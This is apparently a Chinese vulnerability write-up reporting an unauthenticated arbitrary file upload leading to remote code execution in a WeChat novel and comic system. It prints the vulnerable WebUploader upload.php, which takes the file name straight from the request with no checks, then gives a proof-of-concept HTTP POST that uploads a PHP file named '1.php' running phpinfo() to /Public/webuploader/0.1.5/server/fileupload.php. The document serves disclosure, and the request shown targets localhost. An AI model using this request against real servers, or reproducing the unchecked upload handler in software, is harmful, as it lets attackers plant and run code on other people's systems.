微信公众号小说漫画系统存在前台任意文件上传漏洞(RCE)

<?php/** * upload.php * * Copyright 2013, Moxiecode Systems AB * Released under GPL License. * * License: http://www.plupload.com/license * Contributing: http://www.plupload.com/contributing */#!! 注意#!! 此文件只是个示例，不要用于真正的产品之中。#!! 不保证代码安全性。#!! IMPORTANT:#!! this file is just an example, it doesn't incorporate any security checks and#!! is not recommended to be used in production environment as it is. Be sure to#!! revise it and customize to your needs.// Make sure file is not cached (as it happens for example on iOS devices)header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");header("Cache-Control: no-store, no-cache, must-revalidate");header("Cache-Control: post-check=0, pre-check=0", false);header("Pragma: no-cache");// Support CORS// header("Access-Control-Allow-Origin: *");// other CORS headers if any...if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {    exit; // finish preflight CORS requests here}//echo $_SERVER['REQUEST_METHOD']."hahahah";if ( !empty($_REQUEST[ 'debug' ]) ) {    $random = rand(0, intval($_REQUEST[ 'debug' ]) );    if ( $random === 0 ) {        header("HTTP/1.0 500 Internal Server Error");        exit;    }}// header("HTTP/1.0 500 Internal Server Error");// exit;// 5 minutes execution time@set_time_limit(5 * 60);// Uncomment this one to fake upload time// usleep(5000);// Settings// $targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";$targetDir = 'upload_tmp';$uploadDir = 'upload';$cleanupTargetDir = true; // Remove old files$maxFileAge = 5 * 3600; // Temp file age in seconds// Create target dirif (!file_exists($targetDir)) {    @mkdir($targetDir);}// Create target dirif (!file_exists($uploadDir)) {    @mkdir($uploadDir);}// Get a file nameif (isset($_REQUEST["name"])) {    $fileName = $_REQUEST["name"];} elseif (!empty($_FILES)) {    $fileName = $_FILES["file"]["name"];} else {    $fileName = uniqid("file_");}$filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName;$uploadPath = $uploadDir . DIRECTORY_SEPARATOR . $fileName;// Chunking might be enabled$chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;$chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 1;// Remove old temp filesif ($cleanupTargetDir) {    if (!is_dir($targetDir) || !$dir = opendir($targetDir)) {        die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}');    }    while (($file = readdir($dir)) !== false) {        $tmpfilePath = $targetDir . DIRECTORY_SEPARATOR . $file;        // If temp file is current file proceed to the next        if ($tmpfilePath == "{$filePath}_{$chunk}.part" || $tmpfilePath == "{$filePath}_{$chunk}.parttmp") {            continue;        }        // Remove temp file if it is older than the max age and is not the current file        if (preg_match('/.(part|parttmp)$/', $file) && (@filemtime($tmpfilePath) < time() - $maxFileAge)) {            @unlink($tmpfilePath);        }    }    closedir($dir);}// Open temp fileif (!$out = @fopen("{$filePath}_{$chunk}.parttmp", "wb")) {    die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');}if (!empty($_FILES)) {    if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {        die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');    }    // Read binary input stream and append it to temp file    if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');    }} else {    if (!$in = @fopen("php://input", "rb")) {        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');    }}while ($buff = fread($in, 4096)) {    fwrite($out, $buff);}@fclose($out);@fclose($in);rename("{$filePath}_{$chunk}.parttmp", "{$filePath}_{$chunk}.part");$index = 0;$done = true;for( $index = 0; $index < $chunks; $index++ ) {    if ( !file_exists("{$filePath}_{$index}.part") ) {        $done = false;        break;    }}if ( $done ) {    if (!$out = @fopen($uploadPath, "wb")) {        die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');    }    if ( flock($out, LOCK_EX) ) {        for( $index = 0; $index < $chunks; $index++ ) {            if (!$in = @fopen("{$filePath}_{$index}.part", "rb")) {                break;            }            while ($buff = fread($in, 4096)) {                fwrite($out, $buff);            }            @fclose($in);            @unlink("{$filePath}_{$index}.part");        }        flock($out, LOCK_UN);    }    @fclose($out);}// Return Success JSON-RPC responsedie('{"jsonrpc" : "2.0", "result" : null, "id" : "id"}');

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 197Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBWCookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639Host: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.phpSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1------WebKitFormBoundary03rNBzFMIytvpWhyContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundary03rNBzFMIytvpWhy--